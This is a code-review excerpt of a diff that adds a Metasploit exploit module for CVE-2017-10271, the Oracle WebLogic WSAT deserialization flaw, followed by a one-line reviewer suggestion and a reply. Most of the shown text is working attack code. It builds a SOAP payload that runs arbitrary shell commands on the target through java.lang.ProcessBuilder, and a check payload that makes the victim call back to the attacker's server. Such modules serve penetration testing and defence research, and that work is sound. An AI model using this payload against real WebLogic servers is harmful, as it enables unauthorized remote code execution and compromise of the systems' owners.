modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb

```diff
@@ -0,0 +1,207 @@
+        ],
+        'References'     =>
+          [
+            ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin
+            ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept
+            ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit
+            ['CVE', '2017-10271'],
+            ['EDB', '43458']
+          ],
+        'Platform'      => %w{ win unix },
+        'Arch'          => [ ARCH_CMD ],
+        'Targets'        =>
+          [
+            [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
+            [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
+          ],
+        'DisclosureDate' => "Oct 19 2017",
+        # Note that this is by index, rather than name. It's generally easiest
+        # just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
+      OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
+      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
+      OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
+    ])
+  end
+
+  def cmd_base
+    if target['Platform'] == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
+    end
+  end
+
+  def cmd_opt
+    if target['Platform'] == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
+  end
+
+
+  #
+  # This generates a XML payload that will execute the desired payload on the RHOST
+  #
+  def exploit_process_builder_payload
+    # Generate a payload which will execute on a *nix machine using /bin/sh
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <object class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>#{cmd_base}</string>
+            </void>
+            <void index="1">
+              <string>#{cmd_opt}</string>
+            </void>
+            <void index="2">
+              <string>#{payload.encoded.encode(xml: :text)}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </object>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  #
+  # This builds a XML payload that will generate a HTTP GET request to our SRVHOST
+  # from the target machine.
+  #
+  def check_process_builder_payload
+    return_request_url = "http://#{lookup_actual_host}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
```

Comment:
I think you can use `get_uri` here instead.

Reply:
Fixed